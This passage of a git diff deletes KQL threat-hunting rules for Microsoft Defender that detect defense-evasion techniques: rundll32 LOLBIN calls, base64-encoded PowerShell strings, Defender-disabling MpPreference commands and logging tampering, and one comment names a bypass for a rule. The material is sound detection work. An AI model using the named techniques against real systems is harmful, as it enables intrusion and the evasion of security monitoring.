ProcessCommandLine contains " -i:http://3" or ProcessCommandLine contains " -i:http://4" or ProcessCommandLine contains " -i:http://5" or ProcessCommandLine contains " -i:http://6" or ProcessCommandLine contains " -i:http://7" or ProcessCommandLine contains " -i:http://8" or ProcessCommandLine contains " -i:http://9" or ProcessCommandLine contains " -i:https://1" or ProcessCommandLine contains " -i:https://2" or ProcessCommandLine contains " -i:https://3" or ProcessCommandLine contains " -i:https://4" or ProcessCommandLine contains " -i:https://5" or ProcessCommandLine contains " -i:https://6" or ProcessCommandLine contains " -i:https://7" or ProcessCommandLine contains " -i:https://8" or ProcessCommandLine contains " -i:https://9") \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql b/Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql deleted file mode 100644 index ba699c24..00000000 --- a/Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/01/16 -// Level: medium -// Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where ((ProcessCommandLine contains "javascript:" and ProcessCommandLine contains ".RegisterXLL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURLA") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "FileProtocolHandler") or (ProcessCommandLine contains "zipfldr.dll" and ProcessCommandLine contains "RouteTheCall") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "ShellExec_RunDLL") or (ProcessCommandLine contains "mshtml.dll" and ProcessCommandLine contains "PrintHTML") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieframe.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "shdocvw.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "syssetup.dll" and ProcessCommandLine contains "SetupInfObjectInstallAction") or (ProcessCommandLine contains "setupapi.dll" and ProcessCommandLine contains "InstallHinfSection") or (ProcessCommandLine contains "pcwutl.dll" and ProcessCommandLine contains "LaunchApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbShortcut") or (ProcessCommandLine contains "scrobj.dll" and ProcessCommandLine contains "GenerateTypeLib" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "shimgvw.dll" and ProcessCommandLine contains "ImageView_Fullscreen" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "comsvcs.dll" and ProcessCommandLine contains "MiniDump")) and (not((((ProcessCommandLine contains "Shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".cpl") and InitiatingProcessCommandLine contains ".cpl" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe") or ProcessCommandLine contains "shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver" or (ProcessCommandLine endswith ".cpl\"," and ProcessCommandLine startswith "\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql b/Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql deleted file mode 100644 index 7508341f..00000000 --- a/Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/12 -// Level: medium -// Description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution -// Tags: attack.defense_evasion -DeviceProcessEvents -| where InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\" and ((ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Base64") or (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe")) and (not(((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql b/Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql deleted file mode 100644 index 7b6fc83b..00000000 --- a/Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/12 -// Level: medium -// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. -One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. - -// Tags: attack.defense_evasion, attack.t1218 -DeviceNetworkEvents -| where (InitiatingProcessCommandLine contains " /RunHandlerComServer" and InitiatingProcessFolderPath contains "wuauclt") and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine) or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.79.0.0/16") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11")) or (InitiatingProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or InitiatingProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (InitiatingProcessCommandLine contains ":\\Windows\\WinSxS\\" and InitiatingProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ")))) \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql b/Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql deleted file mode 100644 index e2931fc4..00000000 --- a/Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/08/24 -// Level: high -// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line -// Tags: attack.defense_evasion, attack.t1140, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw") \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql b/Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql deleted file mode 100644 index be3160c2..00000000 --- a/Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t -// Date: 2022/05/20 -// Level: high -// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql b/Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql deleted file mode 100644 index 7b67f975..00000000 --- a/Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems) -// Date: 2022/03/01 -// Level: high -// Description: Detects base64 encoded .NET reflective loading of Assembly -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027, attack.t1620 -DeviceProcessEvents -| where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql b/Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql deleted file mode 100644 index 78c3b4de..00000000 --- a/Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/30 -// Level: high -// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains "V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud")) \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql b/Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql deleted file mode 100644 index 9b323c33..00000000 --- a/Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/15 -// Level: medium -// Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence -// Tags: attack.defense_evasion, attack.t1070 -DeviceFileEvents -| where FolderPath endswith "\\PSReadLine\\ConsoleHost_history.txt" \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql b/Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql deleted file mode 100644 index 999c9ee8..00000000 --- a/Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/01 -// Level: medium -// Description: Detects PowerShell core DLL being loaded by an Office Product -// Tags: attack.defense_evasion -DeviceImageLoadEvents -| where (FolderPath contains "\\System.Management.Automation.Dll" or FolderPath contains "\\System.Management.Automation.ni.Dll") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql b/Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql deleted file mode 100644 index dd39645e..00000000 --- a/Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/04/02 -// Level: high -// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging -// Tags: attack.defense_evasion, attack.t1564.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Microsoft\\Windows\\PowerShell" or RegistryKey contains "\\Microsoft\\PowerShellCore") and (RegistryKey endswith "\\ModuleLogging\\EnableModuleLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging" or RegistryKey endswith "\\Transcription\\EnableTranscripting" or RegistryKey endswith "\\Transcription\\EnableInvocationHeader" or RegistryKey endswith "\\EnableScripts") \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql b/Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql deleted file mode 100644 index 5e298951..00000000 --- a/Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/18 -// Level: high -// Description: Detects PowerShell execution to set the ACL of a file or a folder -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject " and ProcessCommandLine contains "-Path ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql b/Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql deleted file mode 100644 index b53f42c8..00000000 --- a/Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/18 -// Level: high -// Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "-Path \"C:\\Windows" or ProcessCommandLine contains "-Path 'C:\\Windows" or ProcessCommandLine contains "-Path %windir%" or ProcessCommandLine contains "-Path $env:windir") and (ProcessCommandLine contains "FullControl" or ProcessCommandLine contains "Allow") \ No newline at end of file diff --git a/Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql b/Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql deleted file mode 100644 index fc55890a..00000000 --- a/Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/04 -// Level: high -// Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "QWRkLU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "BZGQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "U2V0LU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "TZXQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "YWRkLW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "hZGQtbXBwcmVmZXJlbmNlI" or ProcessCommandLine contains "c2V0LW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "zZXQtbXBwcmVmZXJlbmNlI") or (ProcessCommandLine contains "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA") \ No newline at end of file diff --git a/Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql b/Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql deleted file mode 100644 index f715383e..00000000 --- a/Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/03 -// Level: high -// Description: Detects requests to disable Microsoft Defender features using PowerShell commands -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains "DisableArchiveScanning " or ProcessCommandLine contains "DisableRealtimeMonitoring " or ProcessCommandLine contains "DisableIOAVProtection " or ProcessCommandLine contains "DisableBehaviorMonitoring " or ProcessCommandLine contains "DisableBlockAtFirstSeen " or ProcessCommandLine contains "DisableCatchupFullScan " or ProcessCommandLine contains "DisableCatchupQuickScan ") and (ProcessCommandLine contains "$true" or ProcessCommandLine contains " 1 ")) or ((ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA") or (ProcessCommandLine contains "ZGlzYWJsZWFyY2hpdmVzY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVhcmNoaXZlc2Nhbm5pbmcg" or ProcessCommandLine contains "kaXNhYmxlYXJjaGl2ZXNjYW5uaW5nI" or ProcessCommandLine contains "RGlzYWJsZUFyY2hpdmVTY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVBcmNoaXZlU2Nhbm5pbmcg" or ProcessCommandLine contains "EaXNhYmxlQXJjaGl2ZVNjYW5uaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJlaGF2aW9ybW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGViZWhhdmlvcm1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlYmVoYXZpb3Jtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZUJlaGF2aW9yTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVCZWhhdmlvck1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlQmVoYXZpb3JNb25pdG9yaW5nI" or ProcessCommandLine contains 